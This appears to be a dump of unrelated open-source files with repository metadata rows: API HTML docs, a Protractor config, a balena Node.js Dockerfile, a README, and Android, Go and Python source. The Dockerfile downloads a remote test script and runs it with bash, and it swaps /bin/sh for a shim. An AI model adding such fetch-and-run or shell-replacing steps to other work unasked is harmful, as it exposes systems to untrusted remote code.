<li><a href="class-triagens.ArangoDb.ConnectException.html">ConnectException</a></li>
<li><a href="class-triagens.ArangoDb.Exception.html">Exception</a></li>
<li><a href="class-triagens.ArangoDb.ServerException.html">ServerException</a></li>
</ul>
</div>
</div>
</div>
<div id="splitter"></div>
<div id="right">
<div id="rightInner">
<div id="content" class="class">
<h1>Class Vertex</h1>
<div class="description">
<p>Value object representing a single vertex document</p>
</div>
<dl class="tree well">
<dd style="padding-left:0px">
<a href="class-triagens.ArangoDb.Document.html"><span>triagens\ArangoDb\Document</span></a>
</dd>
<dd style="padding-left:30px">
<img src="resources/inherit.png" alt="Extended by">
<b><span>triagens\ArangoDb\Vertex</span></b>
</dd>
</dl>
<div class="alert alert-info">
<b>Namespace:</b> <a href="namespace-triagens.html">triagens</a>\<a href="namespace-triagens.ArangoDb.html">ArangoDb</a><br>
<b>Package:</b> triagens\ArangoDb<br>
<b>Since:</b>
1.2<br>
<b>Located at</b> <a href="source-class-triagens.ArangoDb.Vertex.html#15-25" title="Go to source code">Vertex.php</a>
<br>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h2>Methods summary</h2></div>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h3>Methods inherited from <a href="class-triagens.ArangoDb.Document.html#methods">triagens\ArangoDb\Document</a></h3></div>
<p class="elementList">
<code><a href="class-triagens.ArangoDb.Document.html#___clone">__clone()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___construct">__construct()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___get">__get()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___isset">__isset()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___set">__set()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___toString">__toString()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___unset">__unset()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_createFromArray">createFromArray()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_filterHiddenAttributes">filterHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_get">get()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getAll">getAll()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getAllAsObject">getAllAsObject()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getAllForInsertUpdate">getAllForInsertUpdate()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getChanged">getChanged()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getCollectionId">getCollectionId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getHandle">getHandle()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getHiddenAttributes">getHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getId">getId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getInternalId">getInternalId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getInternalKey">getInternalKey()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getIsNew">getIsNew()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getKey">getKey()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getRevision">getRevision()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_isIgnoreHiddenAttributes">isIgnoreHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_set">set()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setChanged">setChanged()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setHiddenAttributes">setHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setIgnoreHiddenAttributes">setIgnoreHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setInternalId">setInternalId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setInternalKey">setInternalKey()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setIsNew">setIsNew()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setRevision">setRevision()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_toJson">toJson()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_toSerialized">toSerialized()</a></code>
</p>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h2>Constants summary</h2></div>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h3>Constants inherited from <a href="class-triagens.ArangoDb.Document.html#constants">triagens\ArangoDb\Document</a></h3></div>
<p class="elementList">
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_HIDDENATTRIBUTES"><b>ENTRY_HIDDENATTRIBUTES</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_ID"><b>ENTRY_ID</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_IGNOREHIDDENATTRIBUTES"><b>ENTRY_IGNOREHIDDENATTRIBUTES</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_ISNEW"><b>ENTRY_ISNEW</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_KEY"><b>ENTRY_KEY</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_REV"><b>ENTRY_REV</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#OPTION_KEEPNULL"><b>OPTION_KEEPNULL</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#OPTION_POLICY"><b>OPTION_POLICY</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#OPTION_WAIT_FOR_SYNC"><b>OPTION_WAIT_FOR_SYNC</b></a></code>
</p>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h2>Properties summary</h2></div>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h3>Properties inherited from <a href="class-triagens.ArangoDb.Document.html#properties">triagens\ArangoDb\Document</a></h3></div>
<p class="elementList">
<code><a href="class-triagens.ArangoDb.Document.html#$_changed"><var>$_changed</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_doValidate"><var>$_doValidate</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_hiddenAttributes"><var>$_hiddenAttributes</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_id"><var>$_id</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_ignoreHiddenAttributes"><var>$_ignoreHiddenAttributes</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_isNew"><var>$_isNew</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_key"><var>$_key</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_rev"><var>$_rev</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_values"><var>$_values</var></a></code>
</p>
</div>
</div>
</div>
<div id="footer">
ArangoDB-PHP API Documentation API documentation generated by <a href="http://apigen.org">ApiGen</a>
</div>
</div>
<script src="resources/combined.js"></script>
<script src="elementlist.js"></script>
</body>
</html>
| diabl0/arangodb-php | docs/class-triagens.ArangoDb.Vertex.html | HTML | apache-2.0 | 13,104 |
'use strict';
var chai = require('chai');
var promised = require('chai-as-promised');
chai.use(promised);
global.expect = chai.expect;
exports.config = {
// The timeout for each script run on the browser. This should be longer
// than the maximum time your application needs to stabilize between tasks.
allScriptsTimeout: 15000,
// Capabilities to be passed to the webdriver instance.
capabilities: {
'browserName': 'chrome',
'loggingPrefs': {
'browser': 'ALL'
}
},
// ----- What tests to run -----
//
  // Spec patterns are relative to the location of this config file. They may
// include glob patterns.
specs: [
'admin/specs/admin-user-spec.js',
'admin/specs/users-spec.js',
'admin/specs/groups-spec.js',
'admin/specs/system-spec.js',
'admin/specs/authorizations-spec.js',
'cockpit/specs/dashboard-spec.js',
'cockpit/specs/process-definition-spec.js',
'cockpit/specs/decision-definition-spec.js',
'cockpit/specs/process-instance-spec.js',
'cockpit/specs/process-definition-filter-spec.js',
'cockpit/specs/variable-spec.js',
'cockpit/specs/suspension-spec.js',
'tasklist/specs/filter-basic-spec.js',
'tasklist/specs/filter-permissions-spec.js',
'tasklist/specs/filter-criteria-spec.js',
'tasklist/specs/filter-vg-spec.js',
    'tasklist/specs/process-start-variables-spec.js',
    'tasklist/specs/task-claiming-spec.js',
'tasklist/specs/tasklist-sorting-spec.js',
'tasklist/specs/tasklist-search-spec.js',
'tasklist/specs/task-detail-view-spec.js',
'tasklist/specs/task-dates-spec.js'
],
// A base URL for your application under test. Calls to protractor.get()
// with relative paths will be prepended with this.
baseUrl: 'http://localhost:8080',
// ----- The test framework -----
//
// Jasmine is fully supported as a test and assertion framework.
// Mocha has limited beta support. You will need to include your own
// assertion framework if working with mocha.
framework: 'mocha',
  // ----- Options to be passed to Mocha -----
  //
  // Options to be passed to the Mocha test framework.
  // See the full list at https://mochajs.org/
mochaOpts: {
timeout: 15000,
colors: false,
reporter: 'xunit-file',
slow: 3000
}
};
| jangalinski/camunda-bpm-webapp | webapp/src/test/js/e2e/ci.conf.js | JavaScript | apache-2.0 | 2,310 |
# AUTOGENERATED FILE
FROM balenalib/zc702-zynq7-ubuntu:cosmic-build
ENV NODE_VERSION 12.20.1
ENV YARN_VERSION 1.22.4
RUN for key in \
6A010C5166006599AA17F08146C2130DFD2497F5 \
; do \
gpg --keyserver pgp.mit.edu --recv-keys "$key" || \
gpg --keyserver keyserver.pgp.com --recv-keys "$key" || \
gpg --keyserver ha.pool.sks-keyservers.net --recv-keys "$key" ; \
done \
&& curl -SLO "http://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION-linux-armv7l.tar.gz" \
&& echo "7283ced5d7c0cc036a35bc2e64b23e7d4b348848170567880edabcf5279f4f8a node-v$NODE_VERSION-linux-armv7l.tar.gz" | sha256sum -c - \
&& tar -xzf "node-v$NODE_VERSION-linux-armv7l.tar.gz" -C /usr/local --strip-components=1 \
&& rm "node-v$NODE_VERSION-linux-armv7l.tar.gz" \
&& curl -fSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" \
&& curl -fSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" \
&& gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
&& mkdir -p /opt/yarn \
&& tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/yarn --strip-components=1 \
&& ln -s /opt/yarn/bin/yarn /usr/local/bin/yarn \
&& ln -s /opt/yarn/bin/yarn /usr/local/bin/yarnpkg \
&& rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
&& npm config set unsafe-perm true -g --unsafe-perm \
&& rm -rf /tmp/*
CMD ["echo","'No CMD command was set in Dockerfile! Details about CMD command could be found in Dockerfile Guide section in our Docs. Here's the link: https://balena.io/docs"]
RUN curl -SLO "https://raw.githubusercontent.com/balena-io-library/base-images/8accad6af708fca7271c5c65f18a86782e19f877/scripts/assets/tests/[email protected]" \
&& echo "Running test-stack@node" \
&& chmod +x [email protected] \
&& bash [email protected] \
&& rm -rf [email protected]
RUN [ ! -d /.balena/messages ] && mkdir -p /.balena/messages; echo 'Here are a few details about this Docker image (For more information please visit https://www.balena.io/docs/reference/base-images/base-images/): \nArchitecture: ARM v7 \nOS: Ubuntu cosmic \nVariant: build variant \nDefault variable(s): UDEV=off \nThe following software stack is preinstalled: \nNode.js v12.20.1, Yarn v1.22.4 \nExtra features: \n- Easy way to install packages with `install_packages <package-name>` command \n- Run anywhere with cross-build feature (for ARM only) \n- Keep the container idling with `balena-idle` command \n- Show base image details with `balena-info` command' > /.balena/messages/image-info
RUN echo '#!/bin/sh.real\nbalena-info\nrm -f /bin/sh\ncp /bin/sh.real /bin/sh\n/bin/sh "$@"' > /bin/sh-shim \
&& chmod +x /bin/sh-shim \
&& cp /bin/sh /bin/sh.real \
&& mv /bin/sh-shim /bin/sh | nghiant2710/base-images | balena-base-images/node/zc702-zynq7/ubuntu/cosmic/12.20.1/build/Dockerfile | Dockerfile | apache-2.0 | 2,764 |
bluebook
========
A simple encrypted notepad application using Java Swing and GNU Crypto.
### Build
The repo contains a NetBeans project (last tested version: 7.1.2). GUI portions of the code are auto-generated by NetBeans' GUI Swing builder, Matisse. To build, open the project in NetBeans and click _Run > Build Project_. To build on the command line, type `ant jar` in the project's root directory. In either case, the runnable _bluebook.jar_ file and its associated _lib_ directory will be created in the project's _dist_ subdirectory.
### Run
To run, type `java -jar bluebook.jar`. AES-256 encrypted data are stored in the file _bluebook.data_, which will be created in the current directory if it does not already exist.
* In plaintext mode, click the notepad/pencil icon to enable editing. The text area's background color will change from grey to blue when something has been modified.
* To encrypt and save after editing, enter your password in the password field, click the lock button, then confirm your password when prompted. (NB: Since the password is never stored, bluebook will encrypt using any password you type twice!)
* To decrypt, enter your password and click the magnifying-glass button.
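
A typical command-line session (assuming the default `dist` layout produced by the build) looks like:

```sh
ant jar                  # build bluebook.jar and its lib/ directory into dist/
cd dist
java -jar bluebook.jar   # the encrypted bluebook.data file lives in the current directory
```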
### License
The original contents of this repository are released under the [Apache 2.0](http://www.apache.org/licenses/LICENSE-2.0) license. See the LICENSE file for details. The GNU Crypto library is distributed under the terms of the GPL (specifically, GPLv2 3(c) / GPLv3 6(c), allowing for distribution of object code); see the README*, LICENSE and COPYING files in the gnu-crypto-2.0.1-bin subdirectory for details and for instructions on obtaining source code.
### Thanks
Thanks to the [Tango Desktop Project](http://tango.freedesktop.org/Tango_Desktop_Project) for public-domain icons and to the [GNU Crypto](http://www.gnu.org/software/gnu-crypto) team. | maddenp/bluebook | README.md | Markdown | apache-2.0 | 1,881 |
/*
* Copyright (c) 2015 IRCCloud, Ltd.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.irccloud.android.fragment;
import android.app.Dialog;
import android.content.Context;
import android.content.DialogInterface;
import android.os.Bundle;
import android.text.SpannableStringBuilder;
import android.text.Spanned;
import android.text.method.ScrollingMovementMethod;
import android.text.style.TabStopSpan;
import android.view.LayoutInflater;
import android.view.View;
import android.widget.TextView;
import androidx.appcompat.app.AlertDialog;
import androidx.fragment.app.DialogFragment;
import com.irccloud.android.R;
import com.irccloud.android.activity.MainActivity;
public class TextListFragment extends DialogFragment {
private TextView textView;
private String title = null;
private String text = null;
public boolean dismissed = false;
public String type;
@Override
public Dialog onCreateDialog(Bundle savedInstanceState) {
Context ctx = getActivity();
if(ctx == null)
return null;
LayoutInflater inflater = (LayoutInflater) ctx.getSystemService(Context.LAYOUT_INFLATER_SERVICE);
View v = inflater.inflate(R.layout.dialog_textlist, null);
textView = v.findViewById(R.id.textView);
textView.setHorizontallyScrolling(true);
textView.setMovementMethod(new ScrollingMovementMethod());
if (savedInstanceState != null && savedInstanceState.containsKey("text")) {
text = savedInstanceState.getString("text");
}
if(text != null) {
setText(text);
}
Dialog d = new AlertDialog.Builder(ctx)
.setView(v)
.setTitle(title)
.setNegativeButton("Close", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
dialog.dismiss();
}
})
.create();
return d;
}
@Override
public void onDismiss(DialogInterface dialog) {
super.onDismiss(dialog);
dismissed = true;
if(getActivity() != null && ((MainActivity)getActivity()).help_fragment == this)
((MainActivity)getActivity()).help_fragment = null;
}
@Override
public void onCancel(DialogInterface dialog) {
super.onCancel(dialog);
dismissed = true;
if(getActivity() != null && ((MainActivity)getActivity()).help_fragment == this)
((MainActivity)getActivity()).help_fragment = null;
}
@Override
    public void onSaveInstanceState(Bundle state) {
        super.onSaveInstanceState(state);
        state.putString("text", text);
    }
public void refresh() {
Bundle args = getArguments();
if(args.containsKey("title")) {
title = args.getString("title");
if(getDialog() != null)
getDialog().setTitle(title);
}
if(args.containsKey("text")) {
text = args.getString("text");
if(textView != null)
setText(text);
}
}
private void setText(String text) {
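        // Install evenly spaced tab stops (every 300 pixels) across the entire
        // string so tab-separated columns in the text line up when rendered.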
SpannableStringBuilder sb = new SpannableStringBuilder(text);
for (int i = 0; i < 100; i++)
sb.setSpan(new TabStopSpan.Standard(i * 300), 0, sb.length(), Spanned.SPAN_EXCLUSIVE_EXCLUSIVE);
textView.setText(sb, TextView.BufferType.SPANNABLE);
}
@Override
public void setArguments(Bundle args) {
super.setArguments(args);
refresh();
}
@Override
public void onPause() {
super.onPause();
}
}
| irccloud/android | src/com/irccloud/android/fragment/TextListFragment.java | Java | apache-2.0 | 4,169 |
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package log
import (
"fmt"
"strings"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/adfin/statster/metrics/core"
)
func TestSimpleWrite(t *testing.T) {
now := time.Now()
batch := core.DataBatch{
Timestamp: now,
MetricSets: make(map[string]*core.MetricSet),
}
batch.MetricSets["pod1"] = &core.MetricSet{
Labels: map[string]string{"bzium": "hocuspocus"},
MetricValues: map[string]core.MetricValue{
"m1": {
ValueType: core.ValueInt64,
MetricType: core.MetricGauge,
IntValue: 31415,
},
},
LabeledMetrics: []core.LabeledMetric{
{
Name: "lm",
MetricValue: core.MetricValue{
MetricType: core.MetricGauge,
ValueType: core.ValueInt64,
IntValue: 279,
},
Labels: map[string]string{
"disk": "hard",
},
},
},
}
log := batchToString(&batch)
assert.True(t, strings.Contains(log, "31415"))
assert.True(t, strings.Contains(log, "m1"))
assert.True(t, strings.Contains(log, "bzium"))
assert.True(t, strings.Contains(log, "hocuspocus"))
assert.True(t, strings.Contains(log, "pod1"))
assert.True(t, strings.Contains(log, "279"))
assert.True(t, strings.Contains(log, "disk"))
assert.True(t, strings.Contains(log, "hard"))
assert.True(t, strings.Contains(log, fmt.Sprintf("%s", now)))
}
func TestSortedOutput(t *testing.T) {
const (
label1 = "abcLabel"
label2 = "xyzLabel"
pod1 = "pod1"
pod2 = "pod2"
metric1 = "metricA"
metric2 = "metricB"
)
metricVal := core.MetricValue{
ValueType: core.ValueInt64,
MetricType: core.MetricGauge,
IntValue: 31415,
}
metricSet := func(pod string) *core.MetricSet {
return &core.MetricSet{
Labels: map[string]string{label2 + pod: pod, label1 + pod: pod},
MetricValues: map[string]core.MetricValue{
metric2 + pod: metricVal,
metric1 + pod: metricVal,
},
LabeledMetrics: []core.LabeledMetric{},
}
}
now := time.Now()
batch := core.DataBatch{
Timestamp: now,
MetricSets: map[string]*core.MetricSet{
pod2: metricSet(pod2),
pod1: metricSet(pod1),
},
}
log := batchToString(&batch)
sorted := []string{
pod1,
label1 + pod1,
label2 + pod1,
metric1 + pod1,
metric2 + pod1,
pod2,
label1 + pod2,
label2 + pod2,
metric1 + pod2,
metric2 + pod2,
}
var (
previous string
previousIndex int
)
for _, metric := range sorted {
metricIndex := strings.Index(log, metric)
assert.NotEqual(t, -1, metricIndex, "%q not found", metric)
if previous != "" {
assert.True(t, previousIndex < metricIndex, "%q should be before %q", previous, metric)
}
previous = metric
previousIndex = metricIndex
}
}
| adfin/statster | metrics/sinks/log/log_sink_test.go | GO | apache-2.0 | 3,246 |
import functools
import warnings
from collections import Mapping, Sequence
from numbers import Number
import numpy as np
import pandas as pd
from . import ops
from . import utils
from . import common
from . import groupby
from . import indexing
from . import alignment
from . import formatting
from .. import conventions
from .alignment import align, partial_align
from .coordinates import DatasetCoordinates, Indexes
from .common import ImplementsDatasetReduce, BaseDataObject
from .utils import (Frozen, SortedKeysDict, ChainMap, maybe_wrap_array)
from .variable import as_variable, Variable, Coordinate, broadcast_variables
from .pycompat import (iteritems, itervalues, basestring, OrderedDict,
dask_array_type)
from .combine import concat
# list of attributes of pd.DatetimeIndex that are ndarrays of time info
_DATETIMEINDEX_COMPONENTS = ['year', 'month', 'day', 'hour', 'minute',
'second', 'microsecond', 'nanosecond', 'date',
'time', 'dayofyear', 'weekofyear', 'dayofweek',
'quarter']
def _get_virtual_variable(variables, key):
"""Get a virtual variable (e.g., 'time.year') from a dict of xray.Variable
objects (if possible)
"""
if not isinstance(key, basestring):
raise KeyError(key)
split_key = key.split('.', 1)
if len(split_key) != 2:
raise KeyError(key)
ref_name, var_name = split_key
ref_var = variables[ref_name]
if ref_var.ndim == 1:
date = ref_var.to_index()
elif ref_var.ndim == 0:
date = pd.Timestamp(ref_var.values)
else:
raise KeyError(key)
if var_name == 'season':
# TODO: move 'season' into pandas itself
seasons = np.array(['DJF', 'MAM', 'JJA', 'SON'])
month = date.month
data = seasons[(month // 3) % 4]
else:
data = getattr(date, var_name)
return ref_name, var_name, Variable(ref_var.dims, data)
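# Illustrative sketch (added; names and data are hypothetical): with a 'time'
# coordinate backed by a pandas.DatetimeIndex, dotted keys resolve like this:
#
#     variables = {'time': Coordinate('time',
#                                     pd.date_range('2000-01-01', periods=3))}
#     _get_virtual_variable(variables, 'time.year')
#     # -> ('time', 'year', Variable(('time',), np.array([2000, 2000, 2000])))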
def _as_dataset_variable(name, var):
"""Prepare a variable for adding it to a Dataset
"""
try:
var = as_variable(var, key=name)
except TypeError:
raise TypeError('Dataset variables must be an array or a tuple of '
'the form (dims, data[, attrs, encoding])')
if name in var.dims:
        # convert the variable into an Index (dimension coordinate)
if var.ndim != 1:
raise ValueError('an index variable must be defined with '
'1-dimensional data')
var = var.to_coord()
return var
def _align_variables(variables, join='outer'):
"""Align all DataArrays in the provided dict, leaving other values alone.
"""
alignable = [k for k, v in variables.items() if hasattr(v, 'indexes')]
aligned = align(*[variables[a] for a in alignable],
join=join, copy=False)
new_variables = OrderedDict(variables)
new_variables.update(zip(alignable, aligned))
return new_variables
def _expand_variables(raw_variables, old_variables={}, compat='identical'):
"""Expand a dictionary of variables.
Returns a dictionary of Variable objects suitable for inserting into a
Dataset._variables dictionary.
This includes converting tuples (dims, data) into Variable objects,
converting coordinate variables into Coordinate objects and expanding
DataArray objects into Variables plus coordinates.
Raises ValueError if any conflicting values are found, between any of the
new or old variables.
"""
new_variables = OrderedDict()
new_coord_names = set()
variables = ChainMap(new_variables, old_variables)
def maybe_promote_or_replace(name, var):
existing_var = variables[name]
if name not in existing_var.dims:
if name in var.dims:
variables[name] = var
else:
common_dims = OrderedDict(zip(existing_var.dims,
existing_var.shape))
common_dims.update(zip(var.dims, var.shape))
variables[name] = existing_var.expand_dims(common_dims)
new_coord_names.update(var.dims)
def add_variable(name, var):
var = _as_dataset_variable(name, var)
if name not in variables:
variables[name] = var
new_coord_names.update(variables[name].dims)
else:
if not getattr(variables[name], compat)(var):
raise ValueError('conflicting value for variable %s:\n'
'first value: %r\nsecond value: %r'
% (name, variables[name], var))
if compat == 'broadcast_equals':
maybe_promote_or_replace(name, var)
for name, var in iteritems(raw_variables):
if hasattr(var, 'coords'):
# it's a DataArray
new_coord_names.update(var.coords)
for dim, coord in iteritems(var.coords):
if dim != name:
add_variable(dim, coord.variable)
var = var.variable
add_variable(name, var)
return new_variables, new_coord_names
def _calculate_dims(variables):
"""Calculate the dimensions corresponding to a set of variables.
Returns dictionary mapping from dimension names to sizes. Raises ValueError
if any of the dimension sizes conflict.
"""
dims = {}
last_used = {}
scalar_vars = set(k for k, v in iteritems(variables) if not v.dims)
for k, var in iteritems(variables):
for dim, size in zip(var.dims, var.shape):
if dim in scalar_vars:
raise ValueError('dimension %s already exists as a scalar '
'variable' % dim)
if dim not in dims:
dims[dim] = size
last_used[dim] = k
elif dims[dim] != size:
raise ValueError('conflicting sizes for dimension %r: '
'length %s on %r and length %s on %r' %
(dim, size, k, dims[dim], last_used[dim]))
return dims
def _merge_expand(aligned_self, other, overwrite_vars, compat):
possible_conflicts = dict((k, v) for k, v in aligned_self._variables.items()
if k not in overwrite_vars)
new_vars, new_coord_names = _expand_variables(other, possible_conflicts, compat)
replace_vars = aligned_self._variables.copy()
replace_vars.update(new_vars)
return replace_vars, new_vars, new_coord_names
def _merge_dataset(self, other, overwrite_vars, compat, join):
aligned_self, other = partial_align(self, other, join=join, copy=False)
replace_vars, new_vars, new_coord_names = _merge_expand(
aligned_self, other._variables, overwrite_vars, compat)
new_coord_names.update(other._coord_names)
return replace_vars, new_vars, new_coord_names
def _merge_dict(self, other, overwrite_vars, compat, join):
other = _align_variables(other, join='outer')
alignable = [k for k, v in other.items() if hasattr(v, 'indexes')]
aligned = partial_align(self, *[other[a] for a in alignable],
join=join, copy=False, exclude=overwrite_vars)
aligned_self = aligned[0]
other = OrderedDict(other)
other.update(zip(alignable, aligned[1:]))
return _merge_expand(aligned_self, other, overwrite_vars, compat)
def _assert_empty(args, msg='%s'):
if args:
raise ValueError(msg % args)
def as_dataset(obj):
"""Cast the given object to a Dataset.
Handles DataArrays, Datasets and dictionaries of variables. A new Dataset
object is only created in the last case.
"""
obj = getattr(obj, '_dataset', obj)
if not isinstance(obj, Dataset):
obj = Dataset(obj)
return obj
class Variables(Mapping):
def __init__(self, dataset):
self._dataset = dataset
def __iter__(self):
return (key for key in self._dataset._variables
if key not in self._dataset._coord_names)
def __len__(self):
return len(self._dataset._variables) - len(self._dataset._coord_names)
def __contains__(self, key):
return (key in self._dataset._variables
and key not in self._dataset._coord_names)
def __getitem__(self, key):
if key not in self._dataset._coord_names:
return self._dataset[key]
else:
raise KeyError(key)
def __repr__(self):
return formatting.vars_repr(self)
class _LocIndexer(object):
def __init__(self, dataset):
self.dataset = dataset
def __getitem__(self, key):
if not utils.is_dict_like(key):
raise TypeError('can only lookup dictionaries from Dataset.loc')
return self.dataset.sel(**key)
class Dataset(Mapping, ImplementsDatasetReduce, BaseDataObject):
"""A multi-dimensional, in memory, array database.
A dataset resembles an in-memory representation of a NetCDF file, and
consists of variables, coordinates and attributes which together form a
self describing dataset.
Dataset implements the mapping interface with keys given by variable names
and values given by DataArray objects for each variable name.
One dimensional variables with name equal to their dimension are index
coordinates used for label based indexing.
"""
# class properties defined for the benefit of __setstate__, which otherwise
# runs into trouble because we overrode __getattr__
_attrs = None
_variables = Frozen({})
groupby_cls = groupby.DatasetGroupBy
def __init__(self, variables=None, coords=None, attrs=None,
compat='broadcast_equals'):
"""To load data from a file or file-like object, use the `open_dataset`
function.
Parameters
----------
variables : dict-like, optional
A mapping from variable names to :py:class:`~xray.DataArray`
objects, :py:class:`~xray.Variable` objects or tuples of the
form ``(dims, data[, attrs])`` which can be used as arguments to
create a new ``Variable``. Each dimension must have the same length
in all variables in which it appears.
coords : dict-like, optional
Another mapping in the same form as the `variables` argument,
        except that each item is saved on the dataset as a "coordinate".
These variables have an associated meaning: they describe
constant/fixed/independent quantities, unlike the
varying/measured/dependent quantities that belong in `variables`.
Coordinates values may be given by 1-dimensional arrays or scalars,
in which case `dims` do not need to be supplied: 1D arrays will be
assumed to give index values along the dimension with the same
name.
attrs : dict-like, optional
Global attributes to save on this dataset.
compat : {'broadcast_equals', 'equals', 'identical'}, optional
String indicating how to compare variables of the same name for
potential conflicts:
- 'broadcast_equals': all values must be equal when variables are
broadcast against each other to ensure common dimensions.
- 'equals': all values and dimensions must be the same.
- 'identical': all values, dimensions and attributes must be the
same.
"""
self._variables = OrderedDict()
self._coord_names = set()
self._dims = {}
self._attrs = None
self._file_obj = None
if variables is None:
variables = {}
if coords is None:
coords = set()
if variables or coords:
self._set_init_vars_and_dims(variables, coords, compat)
if attrs is not None:
self.attrs = attrs
def _add_missing_coords_inplace(self):
"""Add missing coordinates to self._variables
"""
for dim, size in iteritems(self.dims):
if dim not in self._variables:
# This is equivalent to np.arange(size), but
                # waits to create the array until it's actually accessed.
data = indexing.LazyIntegerRange(size)
coord = Coordinate(dim, data)
self._variables[dim] = coord
def _update_vars_and_coords(self, new_variables, new_coord_names={},
needs_copy=True, check_coord_names=True):
"""Add a dictionary of new variables to this dataset.
Raises a ValueError if any dimensions have conflicting lengths in the
new dataset. Otherwise will update this dataset's _variables and
_dims attributes in-place.
Set `needs_copy=False` only if this dataset is brand-new and hence
can be thrown away if this method fails.
"""
# default to creating another copy of variables so can unroll if we end
# up with inconsistent dimensions
variables = self._variables.copy() if needs_copy else self._variables
if check_coord_names:
_assert_empty([k for k in self.data_vars if k in new_coord_names],
'coordinates with these names already exist as '
'variables: %s')
variables.update(new_variables)
dims = _calculate_dims(variables)
# all checks are complete: it's safe to update
self._variables = variables
self._dims = dims
self._add_missing_coords_inplace()
self._coord_names.update(new_coord_names)
def _set_init_vars_and_dims(self, vars, coords, compat):
"""Set the initial value of Dataset variables and dimensions
"""
_assert_empty([k for k in vars if k in coords],
'redundant variables and coordinates: %s')
variables = ChainMap(vars, coords)
aligned = _align_variables(variables)
new_variables, new_coord_names = _expand_variables(aligned,
compat=compat)
new_coord_names.update(coords)
self._update_vars_and_coords(new_variables, new_coord_names,
needs_copy=False, check_coord_names=False)
@classmethod
def load_store(cls, store, decoder=None):
"""Create a new dataset from the contents of a backends.*DataStore
object
"""
variables, attributes = store.load()
if decoder:
variables, attributes = decoder(variables, attributes)
obj = cls(variables, attrs=attributes)
obj._file_obj = store
return obj
def close(self):
"""Close any files linked to this dataset
"""
if self._file_obj is not None:
self._file_obj.close()
self._file_obj = None
